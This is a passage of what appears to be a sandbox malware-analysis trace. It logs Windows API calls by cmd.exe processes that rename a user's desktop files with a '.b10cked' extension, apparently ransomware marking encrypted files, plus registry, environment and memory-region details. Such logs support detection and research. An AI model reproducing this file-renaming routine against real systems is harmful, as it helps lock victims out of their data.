lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegCloseKey (hKey=0x40) returned 0x0 [0220.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e89c | out: phkResult=0x28e89c*=0x40) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x0, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, 
lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x9, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x9, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x9, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegCloseKey (hKey=0x40) returned 0x0 [0220.797] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.797] srand (_Seed=0x5b8863b6) [0220.797] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"" [0220.797] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"" [0220.798] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.798] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.798] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.798] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.798] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.798] _wcsicmp 
(_String1="PROMPT", _String2="CD") returned 13 [0220.798] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.798] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.798] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.798] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.798] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.798] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.798] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.798] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.799] GetEnvironmentStringsW () returned 0x3722a0* [0220.799] FreeEnvironmentStringsW (penv=0x3722a0) returned 1 [0220.799] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.799] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.799] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.799] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.799] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.799] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.799] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.799] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.799] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.799] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.799] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f668 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.799] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f668, lpFilePart=0x28f664 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f664*="Desktop") returned 0x18 [0220.799] 
GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.799] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3e4 | out: lpFindFileData=0x28f3e4) returned 0x36ffe0 [0220.799] FindClose (in: hFindFile=0x36ffe0 | out: hFindFile=0x36ffe0) returned 1 [0220.800] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f3e4 | out: lpFindFileData=0x28f3e4) returned 0x36ffe0 [0220.800] FindClose (in: hFindFile=0x36ffe0 | out: hFindFile=0x36ffe0) returned 1 [0220.800] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f3e4 | out: lpFindFileData=0x28f3e4) returned 0x36ffe0 [0220.800] FindClose (in: hFindFile=0x36ffe0 | out: hFindFile=0x36ffe0) returned 1 [0220.800] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.800] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.800] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.800] GetEnvironmentStringsW () returned 0x372ac0* [0220.800] FreeEnvironmentStringsW (penv=0x372ac0) returned 1 [0220.800] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.801] GetConsoleOutputCP () returned 0x1b5 [0220.801] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.801] GetUserDefaultLCID () returned 0x409 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7a8, cchData=128 | out: lpLCData="0") returned 2 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7a8, cchData=128 | out: lpLCData="0") returned 2 [0220.801] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x24, lpLCData=0x28f7a8, cchData=128 | out: lpLCData="1") returned 2 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.802] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.803] GetConsoleTitleW (in: lpConsoleTitle=0x3608c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.803] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.803] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.803] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.803] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.804] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.804] 
_wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.804] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.804] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.804] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.804] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.804] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.807] GetConsoleTitleW (in: lpConsoleTitle=0x28f4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.807] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.807] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.807] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.807] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.807] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.807] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.808] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.808] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.808] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.808] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.808] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.808] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.808] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.808] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.808] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 
[0220.808] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.808] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.808] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.808] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.808] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.808] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.808] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.808] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.808] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.810] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.810] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.810] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f25c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f254, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f254*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.810] _wcsnicmp (_String1="COPYCMD", 
_String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", 
_MaxCount=0x7) returned -18 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.811] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2=".") returned 8 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2="..") returned 8 [0220.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav")) returned 0x20 [0220.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.812] SetErrorMode (uMode=0x0) returned 0x0 [0220.812] SetErrorMode (uMode=0x1) returned 0x0 [0220.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", nBufferLength=0x104, lpBuffer=0x28ebe4, lpFilePart=0x28ebcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpFilePart=0x28ebcc*="6UVpef.wav") returned 0x23 [0220.812] SetErrorMode (uMode=0x0) returned 0x1 [0220.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2=".") returned 8 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2="..") returned 8 [0220.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav")) returned 0x20 [0220.812] SetErrorMode (uMode=0x0) returned 0x0 [0220.812] SetErrorMode (uMode=0x1) returned 0x0 [0220.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", nBufferLength=0x104, lpBuffer=0x28f060, lpFilePart=0x28edf8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpFilePart=0x28edf8*="6UVpef.wav") returned 0x23 [0220.812] 
SetErrorMode (uMode=0x0) returned 0x1 [0220.812] SetErrorMode (uMode=0x0) returned 0x0 [0220.813] SetErrorMode (uMode=0x1) returned 0x0 [0220.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", nBufferLength=0x104, lpBuffer=0x28f268, lpFilePart=0x28edf8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", lpFilePart=0x28edf8*="6UVpef.wav.b10cked") returned 0x2b [0220.813] SetErrorMode (uMode=0x0) returned 0x1 [0220.813] SetLastError (dwErrCode=0x0) [0220.813] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav.b10cked")) returned 0xffffffff [0220.813] GetLastError () returned 0x2 [0220.813] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", fInfoLevelId=0x1, lpFindFileData=0x28e774, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e774) returned 0x372198 [0220.813] FindNextFileW (in: hFindFile=0x372198, lpFindFileData=0x28e774 | out: lpFindFileData=0x28e774) returned 0 [0220.813] GetLastError () returned 0x12 [0220.813] FindClose (in: hFindFile=0x372198 | out: hFindFile=0x372198) returned 1 [0220.814] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", fInfoLevelId=0x1, lpFindFileData=0x371ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371ac8) returned 0x372198 [0220.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", nBufferLength=0x104, lpBuffer=0x28ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", lpFilePart=0x0) returned 0x2b [0220.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", nBufferLength=0x104, lpBuffer=0x28ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpFilePart=0x0) returned 0x23 [0220.814] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" 
(normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav")) returned 0x20 [0220.814] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav.b10cked"), dwFlags=0x3) returned 1 [0220.815] FindClose (in: hFindFile=0x372198 | out: hFindFile=0x372198) returned 1 [0220.815] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e9c0 | out: _Buffer=" 1") returned 9 [0220.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.815] GetFileType (hFile=0x7) returned 0x2 [0222.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e94c | out: lpMode=0x28e94c) returned 1 [0222.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.932] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e980 | out: lpConsoleScreenBufferInfo=0x28e980) returned 1 [0222.932] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.933] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x28e9c0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.933] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e9a4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x28e9a4*=0x1a) returned 1 [0222.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.933] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.933] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.933] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0222.933] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.934] SetConsoleInputExeNameW () returned 0x1 [0222.934] GetConsoleOutputCP () returned 0x1b5 [0222.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.934] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.934] exit (_Code=0) Process: id = "572" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32894 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32895 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32896 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32897 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32898 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 
0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32899 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32900 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32901 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32902 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32903 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33224 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33225 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33226 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33227 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 33228 start_va = 